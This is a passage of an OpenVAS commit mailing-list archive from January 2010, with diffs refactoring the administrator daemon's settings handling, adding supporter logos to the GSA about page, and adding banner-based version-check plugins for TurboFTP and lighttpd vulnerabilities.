wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 13 Jan 2010 18:49:26 +0100 (CET) Subject: [Openvas-commits] r6405 - in trunk/openvas-administrator: . src Message-ID: <20100113174926.0E90086607DD@pyrosoma.intevation.org> Author: mattm Date: 2010-01-13 18:49:19 +0100 (Wed, 13 Jan 2010) New Revision: 6405 Modified: trunk/openvas-administrator/ChangeLog trunk/openvas-administrator/src/admin.c trunk/openvas-administrator/src/admin.h trunk/openvas-administrator/src/oap.c trunk/openvas-administrator/src/openvasad.c Log: * src/oap.c (build_settings_xml): Remove. (oap_xml_handle_end_element): In CLIENT_GET_SETTINGS use new settings interface. * src/openvasad.c (main): Adjust get_settings command for new settings interface. * src/admin.c (print_setting, print_settings): Remove. * src/admin.h: Update headers accordingly. Modified: trunk/openvas-administrator/ChangeLog =================================================================== --- trunk/openvas-administrator/ChangeLog 2010-01-13 17:44:20 UTC (rev 6404) +++ trunk/openvas-administrator/ChangeLog 2010-01-13 17:49:19 UTC (rev 6405) @@ -1,5 +1,18 @@ 2010-01-13 Matthew Mundell + * src/oap.c (build_settings_xml): Remove. + (oap_xml_handle_end_element): In CLIENT_GET_SETTINGS use new settings + interface. + + * src/openvasad.c (main): Adjust get_settings command for new settings + interface. + + * src/admin.c (print_setting, print_settings): Remove. + + * src/admin.h: Update headers accordingly. + +2010-01-13 Matthew Mundell + * src/oap.c (XML_ERROR_BUSY): New macro. (oap_xml_handle_end_element): In CLIENT_SYNC_FEED use response macros. Modified: trunk/openvas-administrator/src/admin.c =================================================================== --- trunk/openvas-administrator/src/admin.c 2010-01-13 17:44:20 UTC (rev 6404) +++ trunk/openvas-administrator/src/admin.c 2010-01-13 17:49:19 UTC (rev 6405) @@ -61,24 +61,6 @@ /** @todo Add contention handling at this level. */ /** - * @brief Convenience function to produce text output from key/value settings. - * - * This function is used by g_hash_table_foreach(). - * - * @param[in] key The key. - * @param[in] value The value corresponding to the key. - * @param[in] user_data A GString object to which the output should be appended. - */ -static void -print_setting (void * key, void * value, void * user_data) -{ - gchar *text; - text = g_strdup_printf ("%s=%s\n", (gchar *) key, (gchar *) value); - g_string_append ((GString *) user_data, text); - g_free (text); -} - -/** * @brief Convenience function to produce XML output from user list items. * * This function is used by g_slist_foreach(). @@ -283,24 +265,6 @@ /** @todo Get the 200's in these commands from libs (STATUS_OK). */ /** - * @brief Produces a newline separated list from a GHashTable of settings. - * - * @param[in] settings A pointer to a GHashTable containing settings. - * - * @return A pointer to a GString containing the settings list. - */ -GString * -print_settings (GHashTable * settings) -{ - GString *response = g_string_new (""); - if (settings) - { - g_hash_table_foreach (settings, print_setting, response); - } - return response; -} - -/** * @brief Produces an OAP LIST_USERS response from a list of users. * * @param[in] users A pointer to a GSList containing user names. Modified: trunk/openvas-administrator/src/admin.h =================================================================== --- trunk/openvas-administrator/src/admin.h 2010-01-13 17:44:20 UTC (rev 6404) +++ trunk/openvas-administrator/src/admin.h 2010-01-13 17:49:19 UTC (rev 6405) @@ -40,7 +40,6 @@ gboolean openvas_get_sync_script_identification (const gchar *, gchar **); gboolean openvas_get_sync_script_description (const gchar *, gchar **); -GString *print_settings (GHashTable *); GString *print_users_xml (GSList *); GString *print_users_text (GSList *); Modified: trunk/openvas-administrator/src/oap.c =================================================================== --- trunk/openvas-administrator/src/oap.c 2010-01-13 17:44:20 UTC (rev 6404) +++ trunk/openvas-administrator/src/oap.c 2010-01-13 17:49:19 UTC (rev 6405) @@ -146,28 +146,6 @@ } -/* Convenience functions. */ - -/** - * @brief Convenience function to produce XML output from key/value pairs of - * settings. - * This function is used by g_hash_table_foreach(). - * - * @param key The key. - * @param value The value corresponding to the key. - * @param xml_string GString where the resulting XML will be written. - */ -static void -build_settings_xml (void * key, void * value, void * xml_string) -{ - gchar *xml; - xml = g_markup_printf_escaped ("%s", - (gchar *) key, (gchar *) value); - g_string_append ((GString *) xml_string, xml); - g_free (xml); -} - - /* Authenticate. */ /** @@ -1121,27 +1099,27 @@ case CLIENT_GET_SETTINGS: { - GHashTable *scanner_settings_hash_table = get_all_settings - (scanner_config_file, "Misc"); + settings_iterator_t settings; - if (scanner_settings_hash_table != NULL) + if (init_settings_iterator (&settings, scanner_config_file, "Misc")) + SENDF_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("get_settings")); + else { - GString *scanner_settings = g_string_new (""); - g_hash_table_foreach (scanner_settings_hash_table, - build_settings_xml, scanner_settings); SENDF_TO_CLIENT_OR_FAIL ("" "", scanner_config_file); - SEND_TO_CLIENT_OR_FAIL (scanner_settings->str); + + while (settings_iterator_next (&settings)) + SENDF_TO_CLIENT_OR_FAIL ("%s", + settings_iterator_name (&settings), + settings_iterator_value (&settings)); + SEND_TO_CLIENT_OR_FAIL ("" ""); - g_string_free (scanner_settings, TRUE); - g_hash_table_destroy (scanner_settings_hash_table); + cleanup_settings_iterator (&settings); } - else - SENDF_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("get_settings")); set_client_state (CLIENT_AUTHENTIC); break; } Modified: trunk/openvas-administrator/src/openvasad.c =================================================================== --- trunk/openvas-administrator/src/openvasad.c 2010-01-13 17:44:20 UTC (rev 6404) +++ trunk/openvas-administrator/src/openvasad.c 2010-01-13 17:49:19 UTC (rev 6405) @@ -745,10 +745,22 @@ } else if (g_strcasecmp (command, "get_settings") == 0) { - GHashTable *scanner_settings = get_all_settings (scanner_config_file, "Misc"); - g_string_free (response, TRUE); - response = print_settings (scanner_settings); - g_hash_table_destroy (scanner_settings); + settings_iterator_t settings; + + if (init_settings_iterator (&settings, scanner_config_file, "Misc")) + { + g_warning ("Failed to initialise settings iterator!"); + exit (EXIT_FAILURE); + } + else + { + while (settings_iterator_next (&settings)) + g_string_append_printf (response, + "%s=%s\n", + settings_iterator_name (&settings), + settings_iterator_value (&settings)); + cleanup_settings_iterator (&settings); + } } else { From scm-commit at wald.intevation.org Thu Jan 14 00:24:08 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 14 Jan 2010 00:24:08 +0100 (CET) Subject: [Openvas-commits] r6406 - in trunk/gsa: . src/html/src src/html/src/img Message-ID: <20100113232408.BB85686607C5@pyrosoma.intevation.org> Author: jan Date: 2010-01-14 00:24:07 +0100 (Thu, 14 Jan 2010) New Revision: 6406 Added: trunk/gsa/src/html/src/img/bsi-logo.png trunk/gsa/src/html/src/img/gb-logo.png trunk/gsa/src/html/src/img/intevation-logo.png Modified: trunk/gsa/ChangeLog trunk/gsa/src/html/src/about.htm4 Log: * src/html/src/about.htm4: Added supporters with their logos. * src/html/src/img/bsi-logo.png, src/html/src/img/gb-logo.png, src/html/src/img/intevation-logo.png: New. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-13 17:49:19 UTC (rev 6405) +++ trunk/gsa/ChangeLog 2010-01-13 23:24:07 UTC (rev 6406) @@ -1,3 +1,10 @@ +2010-01-14 Jan-Oliver Wagner + + * src/html/src/about.htm4: Added supporters with their logos. + + * src/html/src/img/bsi-logo.png, src/html/src/img/gb-logo.png, + src/html/src/img/intevation-logo.png: New. + 2010-01-13 Matthew Mundell * src/gsad_oap.c (sync_feed_oap): Add DESCRIBE_FEED to COMMANDS so that Modified: trunk/gsa/src/html/src/about.htm4 =================================================================== --- trunk/gsa/src/html/src/about.htm4 2010-01-13 17:49:19 UTC (rev 6405) +++ trunk/gsa/src/html/src/about.htm4 2010-01-13 23:24:07 UTC (rev 6406) @@ -27,6 +27,7 @@ contact info at greenbone.net.

              +

              Main Authors (in alphabetical order):

              @@ -38,5 +39,17 @@
            • Michael Wiegand
            • Felix Wolfsteller +
              		•  +

              +Supported by (in alphabetical order): +

              + + + + +
              + +
              + m4_include(`footer.m4') Added: trunk/gsa/src/html/src/img/bsi-logo.png =================================================================== (Binary files differ) Property changes on: trunk/gsa/src/html/src/img/bsi-logo.png ___________________________________________________________________ Name: svn:mime-type + application/octet-stream Added: trunk/gsa/src/html/src/img/gb-logo.png =================================================================== (Binary files differ) Property changes on: trunk/gsa/src/html/src/img/gb-logo.png ___________________________________________________________________ Name: svn:mime-type + application/octet-stream Added: trunk/gsa/src/html/src/img/intevation-logo.png =================================================================== (Binary files differ) Property changes on: trunk/gsa/src/html/src/img/intevation-logo.png ___________________________________________________________________ Name: svn:mime-type + application/octet-stream From scm-commit at wald.intevation.org Thu Jan 14 11:32:11 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 14 Jan 2010 11:32:11 +0100 (CET) Subject: [Openvas-commits] r6407 - in trunk/openvas-administrator: . src src/tests Message-ID: <20100114103211.3B2E886607DE@pyrosoma.intevation.org> Author: mattm Date: 2010-01-14 11:32:10 +0100 (Thu, 14 Jan 2010) New Revision: 6407 Modified: trunk/openvas-administrator/ChangeLog trunk/openvas-administrator/src/oap.c trunk/openvas-administrator/src/tests/oap_help_0.c Log: * src/oap.c: Order cases and branches alphabetically. (help_text): Sort. Bring width within 80 chars. * src/tests/oap_help_0.c (help_text): Sort. Bring width within 80 chars. Modified: trunk/openvas-administrator/ChangeLog =================================================================== --- trunk/openvas-administrator/ChangeLog 2010-01-13 23:24:07 UTC (rev 6406) +++ trunk/openvas-administrator/ChangeLog 2010-01-14 10:32:10 UTC (rev 6407) @@ -1,3 +1,10 @@ +2010-01-14 Matthew Mundell + + * src/oap.c: Order cases and branches alphabetically. + (help_text): Sort. Bring width within 80 chars. + + * src/tests/oap_help_0.c (help_text): Sort. Bring width within 80 chars. + 2010-01-13 Matthew Mundell * src/oap.c (build_settings_xml): Remove. Modified: trunk/openvas-administrator/src/oap.c =================================================================== --- trunk/openvas-administrator/src/oap.c 2010-01-13 23:24:07 UTC (rev 6406) +++ trunk/openvas-administrator/src/oap.c 2010-01-14 10:32:10 UTC (rev 6407) @@ -183,12 +183,12 @@ " COMMANDS Run a list of commands.\n" " CREATE_USER Create a new user.\n" " DELETE_USER Delete an existing user.\n" +" DESCRIBE_FEED Get details of the NVT feed this administrator uses.\n" +" GET_SETTINGS Get scanner settings.\n" " GET_USERS Get all users.\n" -" GET_SETTINGS Get scanner settings.\n" " GET_VERSION Get the OpenVAS Administrator Protocol version.\n" -" DESCRIBE_FEED Get details of the feed this administrator synchronizes with.\n" -" SYNC_FEED Synchronize with an NVT feed.\n" -" HELP Get this help text.\n"; +" HELP Get this help text.\n" +" SYNC_FEED Synchronize with an NVT feed.\n"; /* Status codes. */ @@ -752,6 +752,8 @@ openvas_append_string (¤t_string_1, attribute); set_client_state (CLIENT_DELETE_USER); } + else if (strcasecmp ("DESCRIBE_FEED", element_name) == 0) + set_client_state (CLIENT_DESCRIBE_FEED); else if (strcasecmp ("GET_USERS", element_name) == 0) { const gchar* attribute; @@ -764,14 +766,12 @@ } else if (strcasecmp ("HELP", element_name) == 0) set_client_state (CLIENT_HELP); + else if (strcasecmp ("GET_SETTINGS", element_name) == 0) + set_client_state (CLIENT_GET_SETTINGS); else if (strcasecmp ("GET_VERSION", element_name) == 0) set_client_state (CLIENT_VERSION); - else if (strcasecmp ("DESCRIBE_FEED", element_name) == 0) - set_client_state (CLIENT_DESCRIBE_FEED); else if (strcasecmp ("SYNC_FEED", element_name) == 0) set_client_state (CLIENT_SYNC_FEED); - else if (strcasecmp ("GET_SETTINGS", element_name) == 0) - set_client_state (CLIENT_GET_SETTINGS); else { if (send_to_client (XML_ERROR_SYNTAX ("oap", "Bogus command name"))) @@ -805,6 +805,37 @@ } break; + case CLIENT_CREATE_USER: + if (strcasecmp ("NAME", element_name) == 0) + { + assert (current_string_1 == NULL); + set_client_state (CLIENT_CREATE_USER_NAME); + } + else if (strcasecmp ("PASSWORD", element_name) == 0) + { + assert (current_string_2 == NULL); + set_client_state (CLIENT_CREATE_USER_PASSWORD); + } + else if (strcasecmp ("ROLE", element_name) == 0) + { + assert (current_string_3 == NULL); + set_client_state (CLIENT_CREATE_USER_ROLE); + } + else + { + if (send_element_error_to_client ("create_user", element_name)) + { + error_send_to_client (error); + return; + } + set_client_state (CLIENT_AUTHENTIC); + g_set_error (error, + G_MARKUP_ERROR, + G_MARKUP_ERROR_UNKNOWN_ELEMENT, + "Error"); + } + break; + case CLIENT_CREDENTIALS: if (strcasecmp ("USERNAME", element_name) == 0) set_client_state (CLIENT_CREDENTIALS_USERNAME); @@ -869,37 +900,6 @@ } break; - case CLIENT_CREATE_USER: - if (strcasecmp ("NAME", element_name) == 0) - { - assert (current_string_1 == NULL); - set_client_state (CLIENT_CREATE_USER_NAME); - } - else if (strcasecmp ("PASSWORD", element_name) == 0) - { - assert (current_string_2 == NULL); - set_client_state (CLIENT_CREATE_USER_PASSWORD); - } - else if (strcasecmp ("ROLE", element_name) == 0) - { - assert (current_string_3 == NULL); - set_client_state (CLIENT_CREATE_USER_ROLE); - } - else - { - if (send_element_error_to_client ("create_user", element_name)) - { - error_send_to_client (error); - return; - } - set_client_state (CLIENT_AUTHENTIC); - g_set_error (error, - G_MARKUP_ERROR, - G_MARKUP_ERROR_UNKNOWN_ELEMENT, - "Error"); - } - break; - default: assert (0); // FIX respond fail to client @@ -972,6 +972,53 @@ SENDF_TO_CLIENT_OR_FAIL (""); break; + case CLIENT_CREATE_USER: + { + assert (strcasecmp ("CREATE_USER", element_name) == 0); + assert (users_dir); + + if (current_string_1 == NULL || strlen (current_string_1) == 0) + SEND_TO_CLIENT_OR_FAIL + (XML_ERROR_SYNTAX ("create_user", + "CREATE_USER requires a name")); + else + switch (openvas_admin_add_user + (current_string_1, /* Name. */ + current_string_2 ?: "", /* Pass. */ + current_string_3 ?: "User", /* Role. */ + users_dir)) + { + case 0: + SEND_TO_CLIENT_OR_FAIL (XML_OK ("create_user")); + break; + case -2: + SEND_TO_CLIENT_OR_FAIL + (XML_ERROR_SYNTAX ("create_user", "User already exists")); + break; + case -1: + default: + SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("create_user")); + break; + } + openvas_free_string_var (¤t_string_1); + openvas_free_string_var (¤t_string_2); + openvas_free_string_var (¤t_string_3); + set_client_state (CLIENT_AUTHENTIC); + break; + } + case CLIENT_CREATE_USER_NAME: + assert (strcasecmp ("NAME", element_name) == 0); + set_client_state (CLIENT_CREATE_USER); + break; + case CLIENT_CREATE_USER_PASSWORD: + assert (strcasecmp ("PASSWORD", element_name) == 0); + set_client_state (CLIENT_CREATE_USER); + break; + case CLIENT_CREATE_USER_ROLE: + assert (strcasecmp ("ROLE", element_name) == 0); + set_client_state (CLIENT_CREATE_USER); + break; + case CLIENT_CREDENTIALS: assert (strcasecmp ("CREDENTIALS", element_name) == 0); set_client_state (CLIENT_AUTHENTICATE); @@ -987,15 +1034,6 @@ set_client_state (CLIENT_CREDENTIALS); break; - case CLIENT_VERSION: - SEND_TO_CLIENT_OR_FAIL ("" - "1.0" - ""); - set_client_state (CLIENT_AUTHENTIC); - break; - case CLIENT_DELETE_USER: if (current_string_1) { @@ -1079,24 +1117,6 @@ break; } - case CLIENT_SYNC_FEED: - switch (openvas_sync_feed (sync_script)) - { - case 0: - SEND_TO_CLIENT_OR_FAIL (XML_OK ("sync_feed")); - break; - case 1: - SEND_TO_CLIENT_OR_FAIL (XML_ERROR_BUSY ("sync_feed")); - break; - default: - assert (0); - case -1: - SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("sync_feed")); - break; - } - set_client_state (CLIENT_AUTHENTIC); - break; - case CLIENT_GET_SETTINGS: { settings_iterator_t settings; @@ -1124,53 +1144,6 @@ break; } - case CLIENT_CREATE_USER: - { - assert (strcasecmp ("CREATE_USER", element_name) == 0); - assert (users_dir); - - if (current_string_1 == NULL || strlen (current_string_1) == 0) - SEND_TO_CLIENT_OR_FAIL - (XML_ERROR_SYNTAX ("create_user", - "CREATE_USER requires a name")); - else - switch (openvas_admin_add_user - (current_string_1, /* Name. */ - current_string_2 ?: "", /* Pass. */ - current_string_3 ?: "User", /* Role. */ - users_dir)) - { - case 0: - SEND_TO_CLIENT_OR_FAIL (XML_OK ("create_user")); - break; - case -2: - SEND_TO_CLIENT_OR_FAIL - (XML_ERROR_SYNTAX ("create_user", "User already exists")); - break; - case -1: - default: - SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("create_user")); - break; - } - openvas_free_string_var (¤t_string_1); - openvas_free_string_var (¤t_string_2); - openvas_free_string_var (¤t_string_3); - set_client_state (CLIENT_AUTHENTIC); - break; - } - case CLIENT_CREATE_USER_NAME: - assert (strcasecmp ("NAME", element_name) == 0); - set_client_state (CLIENT_CREATE_USER); - break; - case CLIENT_CREATE_USER_PASSWORD: - assert (strcasecmp ("PASSWORD", element_name) == 0); - set_client_state (CLIENT_CREATE_USER); - break; - case CLIENT_CREATE_USER_ROLE: - assert (strcasecmp ("ROLE", element_name) == 0); - set_client_state (CLIENT_CREATE_USER); - break; - case CLIENT_GET_USERS: { GSList *users, *user; @@ -1197,6 +1170,33 @@ break; } + case CLIENT_SYNC_FEED: + switch (openvas_sync_feed (sync_script)) + { + case 0: + SEND_TO_CLIENT_OR_FAIL (XML_OK ("sync_feed")); + break; + case 1: + SEND_TO_CLIENT_OR_FAIL (XML_ERROR_BUSY ("sync_feed")); + break; + default: + assert (0); + case -1: + SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("sync_feed")); + break; + } + set_client_state (CLIENT_AUTHENTIC); + break; + + case CLIENT_VERSION: + SEND_TO_CLIENT_OR_FAIL ("" + "1.0" + ""); + set_client_state (CLIENT_AUTHENTIC); + break; + default: assert (0); break; @@ -1229,13 +1229,6 @@ tracef (" XML text: %s\n", text); switch (client_state) { - case CLIENT_CREDENTIALS_USERNAME: - append_to_credentials_username (¤t_credentials, text, text_len); - break; - case CLIENT_CREDENTIALS_PASSWORD: - append_to_credentials_password (¤t_credentials, text, text_len); - break; - case CLIENT_CREATE_USER_NAME: openvas_append_text (¤t_string_1, text, text_len); break; @@ -1246,6 +1239,13 @@ openvas_append_text (¤t_string_3, text, text_len); break; + case CLIENT_CREDENTIALS_USERNAME: + append_to_credentials_username (¤t_credentials, text, text_len); + break; + case CLIENT_CREDENTIALS_PASSWORD: + append_to_credentials_password (¤t_credentials, text, text_len); + break; + default: /* Just pass over the text. */ break; Modified: trunk/openvas-administrator/src/tests/oap_help_0.c =================================================================== --- trunk/openvas-administrator/src/tests/oap_help_0.c 2010-01-13 23:24:07 UTC (rev 6406) +++ trunk/openvas-administrator/src/tests/oap_help_0.c 2010-01-14 10:32:10 UTC (rev 6407) @@ -37,12 +37,12 @@ " COMMANDS Run a list of commands.\n" " CREATE_USER Create a new user.\n" " DELETE_USER Delete an existing user.\n" +" DESCRIBE_FEED Get details of the NVT feed this administrator uses.\n" +" GET_SETTINGS Get scanner settings.\n" " GET_USERS Get all users.\n" -" GET_SETTINGS Get scanner settings.\n" " GET_VERSION Get the OpenVAS Administrator Protocol version.\n" -" DESCRIBE_FEED Get details of the feed this administrator synchronizes with.\n" -" SYNC_FEED Synchronize with an NVT feed.\n" -" HELP Get this help text.\n"; +" HELP Get this help text.\n" +" SYNC_FEED Synchronize with an NVT feed.\n"; int main () From scm-commit at wald.intevation.org Thu Jan 14 12:06:54 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 14 Jan 2010 12:06:54 +0100 (CET) Subject: [Openvas-commits] r6408 - in trunk/openvas-plugins: . scripts Message-ID: <20100114110654.0908486607CC@pyrosoma.intevation.org> Author: mime Date: 2010-01-14 12:06:50 +0100 (Thu, 14 Jan 2010) New Revision: 6408 Added: trunk/openvas-plugins/scripts/TurboFTP_37726.nasl trunk/openvas-plugins/scripts/lighttpd_31600.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt trunk/openvas-plugins/scripts/embedded_web_server_detect.nasl trunk/openvas-plugins/scripts/www_fingerprinting_hmap.nasl Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-14 10:32:10 UTC (rev 6407) +++ trunk/openvas-plugins/ChangeLog 2010-01-14 11:06:50 UTC (rev 6408) @@ -1,3 +1,16 @@ +2010-01-14 Michael Meyer + + * scripts/lighttpd_31600.nasl, + scripts/TurboFTP_37726.nasl: + Added new plugins. + + * scripts/embedded_web_server_detect.nasl: + Detect more embedded webservers. + + * scripts/www_fingerprinting_hmap.nasl: + Removed empty GET request. Same is done by + linksys_empty_GET_DoS.nasl. + 2010-01-13 Christian Kuersteiner * scripts/gb_an_guestbook_detect.nasl: Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2010-01-14 10:32:10 UTC (rev 6407) +++ trunk/openvas-plugins/cve_current.txt 2010-01-14 11:06:50 UTC (rev 6408) @@ -494,5 +494,7 @@ CVE-2009-4422 SecPod svn R CVE-2009-4519 SecPod svn R CVE-2009-4450 SecPod svn R +CVE-2008-4360 Greenbone svn R +37726 Greenbone svn R Added: trunk/openvas-plugins/scripts/TurboFTP_37726.nasl =================================================================== --- trunk/openvas-plugins/scripts/TurboFTP_37726.nasl 2010-01-14 10:32:10 UTC (rev 6407) +++ trunk/openvas-plugins/scripts/TurboFTP_37726.nasl 2010-01-14 11:06:50 UTC (rev 6408) @@ -0,0 +1,93 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# TurboFTP 'DELE' FTP Command Remote Buffer Overflow Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100448); + script_bugtraq_id(37726); + script_version ("1.0-$Revision$"); + + script_name("TurboFTP 'DELE' FTP Command Remote Buffer Overflow Vulnerability"); + +desc = "Overview: +TurboFTP is prone to a remote buffer-overflow vulnerability. + +An attacker can exploit this issue to execute arbitrary code within +the context of the affected application. Failed exploit attempts will +result in a denial-of-service condition. + +TurboFTP 1.00.712 is vulnerable; prior versions may also be affected. + +Solution: +Updates are available. Please see the references for details. + +References: +http://www.securityfocus.com/bid/37726 +http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-004-turboftp-server-1-00-712-dos/ +http://www.turboftp.com/ +http://www.tbsoftinc.com/tbserver/turboftp-server-releasenotes.htm + +Risk factor : High"; + + script_description(desc); + script_summary("Determine if TurboFTP version is 1.00.712"); + script_category(ACT_GATHER_INFO); + script_family("FTP"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl"); + script_require_ports("Services/ftp", 21); + exit(0); +} + +include("ftp_func.inc"); +include("version_func.inc"); + +ftpPort = get_kb_item("Services/ftp"); +if(!ftpPort){ + ftpPort = 21; +} + +if(get_kb_item('ftp/'+port+'/broken'))exit(0); + +if(!get_port_state(ftpPort)){ + exit(0); +} + +ftpbanner = get_ftp_banner(port:ftpPort); + +if("TurboFTP" >!< ftpbanner)exit(0); + +version = eregmatch(pattern: "220 TurboFTP Server ([0-9.]+)", string: ftpbanner); +if(isnull(version[1]))exit(0); + +if(version_is_equal(version: version[1], test_version: "1.00.712")) { + security_hole(port: ftpPort); + exit(0); +} + +exit(0); + + Property changes on: trunk/openvas-plugins/scripts/TurboFTP_37726.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/embedded_web_server_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/embedded_web_server_detect.nasl 2010-01-14 10:32:10 UTC (rev 6407) +++ trunk/openvas-plugins/scripts/embedded_web_server_detect.nasl 2010-01-14 11:06:50 UTC (rev 6408) @@ -51,8 +51,8 @@ banner = get_http_banner(port:port); if ( ! banner ) exit(0); -if (egrep(pattern:"^[Ss]erver: (CUPS|MiniServ|AppleShareIP|Embedded HTTPD|IP_SHARER|Ipswitch-IMail|MACOS_Personal_Websharing|NetCache appliance|ZyXEL-RomPager|cisco-IOS|u-Server|eMule|Allegro-Software-RomPager|RomPager|Desktop On-Call|D-Link|4D_WebStar|IPC at CHIP|Citrix Web PN Server|SonicWALL|Micro-Web|gSOAP|CompaqHTTPServer/|BBC [0-9.]+; .*[cC]oda)", string:banner) || - port == 901 ) +if (egrep(pattern:"^[Ss]erver: (CUPS|MiniServ|AppleShareIP|Embedded Web Server|Embedded HTTPD|IP_SHARER|Ipswitch-IMail|MACOS_Personal_Websharing|NetCache appliance|ZyXEL-RomPager|cisco-IOS|u-Server|eMule|Allegro-Software-RomPager|RomPager|Desktop On-Call|D-Link|4D_WebStar|IPC at CHIP|Citrix Web PN Server|SonicWALL|Micro-Web|gSOAP|CompaqHTTPServer/|BBC [0-9.]+; .*[cC]oda)", string:banner) || + port == 901 || egrep(pattern: "^Webserver:$", string: banner) ) { set_kb_item(name:"Services/www/" + port + "/embedded", value:TRUE); } Added: trunk/openvas-plugins/scripts/lighttpd_31600.nasl =================================================================== --- trunk/openvas-plugins/scripts/lighttpd_31600.nasl 2010-01-14 10:32:10 UTC (rev 6407) +++ trunk/openvas-plugins/scripts/lighttpd_31600.nasl 2010-01-14 11:06:50 UTC (rev 6408) @@ -0,0 +1,88 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Lighttpd 'mod_userdir' Case Sensitive Comparison Security Bypass Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100449); + script_bugtraq_id(31600); + script_cve_id("CVE-2008-4360"); + script_version ("1.0-$Revision$"); + + script_name("Lighttpd 'mod_userdir' Case Sensitive Comparison Security Bypass Vulnerability"); + +desc = "Overview: +The 'lighttpd' program is prone to a security-bypass vulnerability +that occurs in the 'mod_userdir' module. + +Attackers can exploit this issue to bypass certain security +restrictions and obtain sensitive information. This may lead to +other attacks. + +Versions prior to 'lighttpd' 1.4.20 are vulnerable. + +Solution: +The vendor has released lighttpd 1.4.20 to address this issue. Please +see the references for more information. + +References: +http://www.securityfocus.com/bid/31600 +http://www.lighttpd.net/ +http://www.lighttpd.net/security/lighttpd_sa_2008_06.txt + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if lighttpd version is < 1.4.20"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +banner = get_http_banner(port: port); +if(!banner)exit(0); + +if("lighttpd/" >!< banner)exit(0); + +version = eregmatch(pattern: "Server: lighttpd/([0-9.]+)", string: banner); +if(isnull(version[1]))exit(0); + + if(version_is_less(version: version[1], test_version: "1.4.20")) { + security_warning(port:port); + exit(0); + } + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/lighttpd_31600.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/www_fingerprinting_hmap.nasl =================================================================== --- trunk/openvas-plugins/scripts/www_fingerprinting_hmap.nasl 2010-01-14 10:32:10 UTC (rev 6407) +++ trunk/openvas-plugins/scripts/www_fingerprinting_hmap.nasl 2010-01-14 11:06:50 UTC (rev 6408) @@ -2072,7 +2072,8 @@ 'GET / HTTP/3.14\r\nHost: ' + h + '\r\n\r\n', # SciFi 'GET / HTTP/1.X\r\n\r\n', # Alphanum HTTP version 'GET / HTTP/\r\n\r\n', # Incomplete -'GET\r\n\r\n', # Very incomplete! +# Removed: covered by linksys_empty_GET_DoS.nasl +#'GET\r\n\r\n', # Very incomplete! 'get / http/1.0\r\n\r\n', # Lowercase method 'GET / OPENVAS/1.0\r\n\r\n', # Unknown protocol 'GET\t/\tHTTP/1.0\r\n\r\n', # Tab separator From scm-commit at wald.intevation.org Thu Jan 14 15:48:14 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 14 Jan 2010 15:48:14 +0100 (CET) Subject: [Openvas-commits] r6409 - in trunk/openvas-administrator: . src Message-ID: <20100114144814.8A94C86607C5@pyrosoma.intevation.org> Author: mattm Date: 2010-01-14 15:48:13 +0100 (Thu, 14 Jan 2010) New Revision: 6409 Modified: trunk/openvas-administrator/ChangeLog trunk/openvas-administrator/src/oap.c Log: Initiate switch to more manageable data passing mechanism. * src/oap.c (get_users_data_t, command_data_t): New types. (get_users_data_reset, command_data_init): New function. (current_int_1, current_int_2): Remove. (command_data, get_users_data): New variables. (oap_xml_handle_start_element, oap_xml_handle_end_element): Use new data passing mechanism for GET_USERS. (init_oap): Neaten doc. Init command_data. Modified: trunk/openvas-administrator/ChangeLog =================================================================== --- 